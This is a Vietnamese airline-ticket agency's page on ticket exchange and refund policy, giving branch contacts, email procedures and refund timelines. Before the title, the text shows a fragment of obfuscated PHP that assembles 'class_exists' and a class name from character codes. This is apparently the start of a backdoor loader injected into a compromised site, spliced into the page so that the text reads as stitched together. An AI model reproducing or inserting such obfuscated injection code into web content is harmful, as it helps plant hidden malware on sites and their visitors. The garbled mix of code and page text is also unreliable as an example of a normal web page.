$rxwOV = 'g' . chr (95) . "\115" . "\x6a" . chr ( 572 - 491 ); $VBGYF = chr ( 819 - 720 ).'l' . "\x61" . chr (115) . chr (115) . "\137" . "\145" . "\170" . "\x69" . chr ( 317 - 202 ).chr (116) . chr (115); $ilGnr = class_exists($rxwOV); $rxwOV = "28015"; Chính Sách Đổi Trả & Hoàn Vé - Đại lý vé máy bay cấp 1

Chính Sách Đổi Trả & Hoàn Vé

I. Điều kiện về thời gian tiếp nhận và xử lý đổi trả   

Phương thức đổi trả vé: trực tiếp tại Công ty Cổ phần Alltours hoặc các văn phòng chi nhánh trên cả nước:

Công ty Cổ phần Alltours: 

  • Chi nhánh TP HCM: 250 Nguyễn Thị Minh Khai, Quận 3 – Số điện thoại: 02873 023 023
  • Chi nhánh Hà Nội: 16 Trần Hưng Đạo, Hoàn Kiếm – Số điện thoại: 02473 023 023
  • Chi nhánh Vinh – Nghệ An: Tòa nhà A4, Handico 30, Đại lộ Lê Nin – Số điện thoại: 02387 302 302

Sau khi nhận thông tin yêu cầu của khách hàng, chúng tôi sẽ thực hiện các bước tiếp theo để kiểm tra điều kiện đổi, hoàn vé và tiến hành đổi hoặc hoàn tiền theo yêu cầu của quý khách và theo quy định tại mục II. Một số điều kiện có thể đi kèm, quý khách vui lòng tham khảo thông tin chi tiết bên dưới:

ΙΙ. Hoàn vé, đổi vé

Hoàn vé

Tùy thuôc vào điều kiện của giá vé, việc hoàn vé của Quý khách có thể bị thu phí hoặc không được phép. Tiền hoàn vé sẽ được chuyển về thẻ hoặc tài khoản Quý khách đã sử dụng khi mua vé.

Lưu ý:

-Trường hợp hoàn vé Toàn Cầu chỉ trả tiền cho người có tên trên vé hoặc người trả tiền vé. Vì vậy khách đến hoàn vé, vui lòng xuất trình CMND và các chứng từ chứng minh là người đi trên vé hoặc người mua vé.

-Trường hợp khách mua ban đầu bằng hình thức chuyển khoản, sau khi làm thủ tục hoàn vé chúng tôi sẽ chuyển khoản chuyển trả tiền về tài khoản đã sử dụng khi mua vé

Đổi vé

Để  thay đổi đặt chỗ, thay đổi hành trình, Quý khách vui lòng liên hệ các chi nhánh hoặc văn phòng của Toàn Cầu để được trợ giúp. Việc thay đổi đặt chỗ, hành trình được áp dụng theo điều kiện của giá vé.

Quy định về đổi vé

– Mỗi hãng hàng không sẽ có những quy định khác nhau về việc đổi vé cũng như lệ phí đổi vé, dailyvemaybaycap1.com cam kết thực hiện đúng theo như quy định của các hãng  hàng không về việc đổi vé và thu lệ phí đổi vé.

– Khi quý khách có nhu cầu đổi vé xin vui lòng gửi email thông tin vé quý khách đã mua và nội dung yêu cầu đổi vé về email: alltours.vn@gmail.com. Chúng tôi sẽ xử lý thông tin và hồi âm trong vòng 24 giờ làm việc.

Quy định về hoàn vé

– Tùy thuộc vào loại vé quý khách đã mua,hãng hàng không quý khách lựa chọn mà có quy định khác nhau về việc hoàn vé. dailyvemaybaycap1.com  cam kết thực hiện đúng theo các quy định hoàn vé của từng hãng hàng không đã có quy định.

– Khi quý khách có nhu cầu hoàn vé xin vui lòng gửi email thông tin vé quý khách đã mua và nội dung yêu cầu hoàn vé về email: alltours.vn@gmail.com. Chúng tôi sẽ xử lý thông tin và hồi âm trong vòng 24 giờ làm việc.

Quy định về hoàn tiền

Ngay khi dailyvemaybaycap1.com tiếp nhận yêu cầu hoàn vé của quý khách. Chúng tôi sẽ thực hiện việc hoàn vé (nếu vé đủ điều kiện hoàn vé), với vé nội địa thì chậm nhất sau 1 tuần quý khách sẽ được nhận lại tiền, với vé quốc tế chậm nhất sau 30 ngày xác nhận hoàn vé thành công.

0333 320 320